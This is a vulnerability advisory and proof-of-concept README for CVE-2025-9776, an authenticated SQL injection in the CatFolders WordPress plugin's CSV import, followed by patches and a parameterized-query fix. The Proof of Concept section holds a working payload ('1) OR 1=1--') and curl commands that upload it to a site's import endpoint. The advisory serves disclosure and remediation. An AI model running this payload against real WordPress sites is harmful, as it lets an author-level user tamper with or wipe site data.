SnailSploit/CVE-2025-9776
CVE-2025-9776: Authenticated SQL Injection in CatFolders WordPress Plugin

Keywords: CVE-2025-9776, CatFolders WordPress vulnerability, SQL injection WordPress, authenticated SQL injection, WordPress security, CSV import vulnerability, WordPress plugin exploit, CWE-89, WordPress database attack, media library vulnerability, WordPress CVE 2025

Overview

An authenticated SQL Injection vulnerability was discovered in the CatFolders WordPress plugin that allows Author-level users to manipulate database queries through malicious CSV imports.

Discovered by: Kai Aizen (SnailSploit)
Published: 2025
CVSS Score: 6.5 (Medium)
CWE: CWE-89 - SQL Injection

Vulnerability Details

Description

CatFolders – Tame Your WordPress Media Library by Category contains an authenticated SQL Injection vulnerability in the CSV import functionality. The attachments column from a user-supplied CSV is split into a list and passed directly to FolderModel::set_attachments() which concatenates those values into raw SQL IN (...) clauses without proper sanitization or parameterization.

Impact

This vulnerability allows authenticated attackers with Author-level privileges to:

  • Execute arbitrary SQL queries
  • Mass-delete or manipulate folder-attachment mappings
  • Potentially expose data, depending on the payload and database structure
  • Compromise database integrity and availability

Affected Versions

  • Vulnerable: All versions ≤ 2.5.2
  • Patched: Version 2.5.3 and above (verify with vendor)

CVSS v3.1 Metrics

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Metric                 Value
Attack Vector          Network (AV:N)
Attack Complexity      Low (AC:L)
Privileges Required    Low (PR:L) - Author+
User Interaction       None (UI:N)
Scope                  Unchanged (S:U)
Confidentiality        None (C:N)
Integrity              Low (I:L)
Availability           Low (A:L)

Technical Details

Vulnerable Code Path

The vulnerability exists in the CSV import workflow:

File: includes/Rest/Controllers/ImportController.php

  1. The import_csv method parses the uploaded CSV without per-field sanitization
  2. restore_folders() calls:

     FolderModel::set_attachments(
         $new_folder['id'],
         explode(',', $folder['attachments']),
         false
     );

File: includes/Models/FolderModel.php

  1. set_attachments() builds raw SQL using string concatenation:

     'raw' => 'post_id IN (' . $attachmentIds . ')'

  2. Each element is neither cast to integer nor parameterized, allowing SQL injection

Attack Vector

An attacker with Author-level privileges (upload_files capability) can inject malicious SQL through the CSV import endpoint:

Malicious CSV payload:

id,name,attachments
1,Test Folder,"1) OR 1=1--"

Resulting vulnerable query:

SELECT folder_id FROM wp_catf_folder_posts 
WHERE post_id IN (1) OR 1=1--)

This breaks out of the IN(...) clause and alters query semantics, potentially affecting all rows.

Prerequisites

  • Author-level account (or higher) on target WordPress site
  • CatFolders plugin installed and active
  • Access to the REST API import endpoint

Proof of Concept

Step 1: Discover the REST Namespace

curl -s https://target.site/wp-json | jq -r '.routes | keys[]' | grep '/import-csv$'

Typical result: /catf/v1/import-csv

Step 2: Prepare Malicious CSV

Create a file named catf_inject.csv:

id,name,attachments
1,Malicious Folder,"1) OR 1=1--"

Step 3: Execute the Attack

NS="/catf/v1"  # Replace with discovered namespace

curl -i \
  -u 'author_user:APPLICATION_PASSWORD' \
  -F "file=@catf_inject.csv;type=text/csv" \
  -X POST "https://target.site/wp-json${NS}/import-csv"

Expected response:

{ "success": true }

Impact Demonstration

The server constructs and executes:

SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN (1) OR 1=1--)

This may perform broader DELETE/INSERT operations than intended, often wiping folder-attachment relationships across the entire database.

Safe Testing Environment

Run the standalone SQLite simulation to observe the vulnerability safely:

python3 poc/catfolders_sql_poc.py

This prints the vulnerable query and demonstrates how a malicious token returns all rows, while a parameterized version properly rejects it.

Remediation

For Site Administrators

Immediate Action Required:

  1. Update CatFolders to version 2.5.3 or later
  2. Review user accounts with Author-level or higher privileges
  3. Audit database logs for suspicious queries between affected dates
  4. Check folder-attachment mappings for unexpected modifications

For Developers

Two minimal hardening steps:

1. Sanitize IDs Before Calling the Model

- FolderModel::set_attachments( $new_folder['id'], explode(',', $folder['attachments']), false );
+ $ids = array_filter( array_map( 'intval', explode(',', $folder['attachments']) ) );
+ if ( ! empty( $ids ) ) {
+     FolderModel::set_attachments( (int) $new_folder['id'], $ids, false );
+ }
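Review bot: intval() coerces rather than rejects, so a malformed token such as the advisory's "1) OR 1=1--" silently becomes attachment id 1 and is imported instead of being reported; if the import should fail on bad data, validate each token (ctype_digit() or a ^\d+$ preg_match) before the cast and surface the offending row. Also note that array_filter() with no callback only drops 0 and other falsy values, so negative integers still pass through to the model.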

2. Enforce Integers Inside set_attachments()

  $imgIds = apply_filters( 'catf_attachment_ids_to_folder', $imgIds );
+ $imgIds = array_values( array_filter( array_map( 'intval', (array) $imgIds ) ) );
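Review bot: the integer cast runs after apply_filters(), so any callback hooked to catf_attachment_ids_to_folder still receives the unsanitized values; move the array_map('intval', ...) line above the filter (or apply it on both sides of it). Even with integer-only values, the 'raw' => 'post_id IN (' . $attachmentIds . ')' concatenation shown under Technical Details should still be replaced by $wpdb->prepare() with one %d per id, as the Stronger Recommendation below describes.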

Stronger Recommendation

Replace all raw SQL concatenation with parameterized queries using WordPress's $wpdb->prepare():

$placeholders = implode(',', array_fill(0, count($imgIds), '%d'));
$query = $wpdb->prepare(
    "SELECT folder_id FROM {$wpdb->prefix}catf_folder_posts WHERE post_id IN ($placeholders)",
    ...$imgIds
);
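As an added example (not the repository's poc/catfolders_sql_poc.py and not plugin code), the following Python script runs the raw IN (...) concatenation and the recommended fix side by side against an in-memory SQLite table with constructed rows; php_intval is an assumed approximation of PHP's intval() so that sanitize_ids matches the array_filter(array_map('intval', ...)) line above, and safe_lookup uses one placeholder per id the way the $wpdb->prepare() snippet does.

```python
import re
import sqlite3

# Constructed sample table: folder 1 owns attachments 1 and 2, folder 2 owns 3 and 4.
SAMPLE_ROWS = [(1, 1), (1, 2), (2, 3), (2, 4)]
MALICIOUS_FIELD = "1) OR 1=1--"  # the attachments cell from the advisory's CSV


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_catf_folder_posts (folder_id INTEGER, post_id INTEGER)")
    conn.executemany("INSERT INTO wp_catf_folder_posts VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, attachments_field):
    # Mirrors the plugin: explode(',') then concatenate into a raw IN (...) clause.
    # '--' starts a SQL comment, so the trailing ')' is ignored and OR 1=1 matches every row.
    ids = attachments_field.split(",")
    sql = "SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN (" + ",".join(ids) + ")"
    return sorted({row[0] for row in conn.execute(sql)})


_LEADING_INT = re.compile(r"^\s*[+-]?\d+")


def php_intval(token):
    # Assumed approximation of PHP intval(): leading integer if present, otherwise 0.
    match = _LEADING_INT.match(token)
    return int(match.group()) if match else 0


def sanitize_ids(attachments_field):
    # Mirrors array_filter(array_map('intval', explode(',', ...))): cast, then drop zeros.
    return [v for v in (php_intval(t) for t in attachments_field.split(",")) if v != 0]


def safe_lookup(conn, attachments_field):
    # Integer-only ids bound through one placeholder per value, as prepare() with %d does.
    ids = sanitize_ids(attachments_field)
    if not ids:
        return []
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN ({placeholders})"
    return sorted({row[0] for row in conn.execute(sql, ids)})


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_lookup(db, MALICIOUS_FIELD))  # every folder
    print("hardened:  ", safe_lookup(db, MALICIOUS_FIELD))        # only folder 1
```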

Additionally:

  • Validate all CSV fields strictly before processing
  • Implement input type validation at the API layer
  • Add rate limiting to the import endpoint
  • Log all import operations for audit trails

Patch File

A complete patch is available in patch/catfolders_fix.patch

Repository Structure

CVE-2025-9776/
├── README.md                    # This file
├── poc/
│   ├── catf_inject.csv         # Malicious CSV payload
│   └── catfolders_sql_poc.py   # Safe SQLite simulation
└── patch/
    └── catfolders_fix.patch    # Recommended fixes

Timeline

  • Discovery Date: 2025
  • Vendor Notification: Coordinated disclosure via Wordfence
  • Public Disclosure: 2025
  • Patch Available: Version 2.5.3

Credits

Researcher: Kai Aizen (SnailSploit)

Disclosure Process: Coordinated through Wordfence Bug Bounty Program

Ethical Considerations

⚠️ IMPORTANT DISCLAIMER

This Proof of Concept is provided exclusively for defensive research and educational purposes.

Usage Guidelines

  • DO: Test on your own systems or with explicit written authorization
  • DO: Use for security training and awareness
  • DO: Implement the fixes in your own code
  • DO NOT: Test against systems without permission
  • DO NOT: Use for malicious purposes
  • DO NOT: Exploit in production environments

Legal Notice

Unauthorized access to computer systems is illegal under laws including:

  • Computer Fraud and Abuse Act (CFAA) - United States
  • Computer Misuse Act - United Kingdom
  • Similar legislation in other jurisdictions

Use at your own risk. The researchers and SnailSploit assume no liability for misuse of this information.

Contact

For questions or additional information about this vulnerability:


Stay secure and keep your WordPress installations updated!

Last updated: October 13, 2025

About

CVE-2025-9776 — CatFolders WordPress Plugin: Authenticated SQL Injection via CSV Import | POC + Walkthrough
